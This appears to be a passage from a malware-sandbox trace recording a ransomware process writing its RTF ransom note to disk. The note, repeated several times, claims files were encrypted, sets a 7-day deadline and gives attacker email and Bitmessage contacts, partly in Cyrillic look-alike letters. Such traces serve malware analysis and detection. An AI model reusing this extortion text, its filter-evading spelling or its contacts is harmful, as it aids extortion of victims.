bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0298.728] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.739] CloseHandle (hObject=0x27c) returned 1 [0298.739] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca-es-valencia\\#readme_eman#.rtf")) returned 0xffffffff [0298.739] GetLastError () returned 0x2 [0298.739] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca-es-valencia\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.794] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 